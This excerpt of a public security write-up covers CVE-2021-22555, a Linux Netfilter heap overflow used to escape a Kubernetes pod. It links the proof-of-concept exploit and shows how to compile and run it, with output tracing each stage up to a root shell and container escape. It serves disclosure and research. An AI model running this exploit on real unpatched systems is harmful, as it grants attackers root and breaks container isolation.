CVE-2021-22555: Turning \x00\x00 into 10000$


This article is excerpted from https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html



CVE-2021-22555 is a 15-year-old heap out-of-bounds write vulnerability in Linux Netfilter. It is powerful enough to bypass all modern security mitigations and achieve kernel code execution. It was used to break Kubernetes pod isolation in the kCTF cluster and earned $10,000 for charity (Google matched the amount, doubling the donation to $20,000).


Proof-Of-Concept

The Proof-Of-Concept is available at https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555.

Executing it on a vulnerable machine will grant you root:

[email protected]:~$ gcc -m32 -static -o exploit exploit.c
[email protected]:~$ ./exploit
[+] Linux Privilege Escalation by [email protected] - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffc
[+] real_idx: fc4

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff91a49cb7f000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff91a49c7a0000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
[email protected]:/# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/#



This article was first published on the WeChat official account 黑伞攻防实验室: CVE-2021-22555: Turning \x00\x00 into 10000$
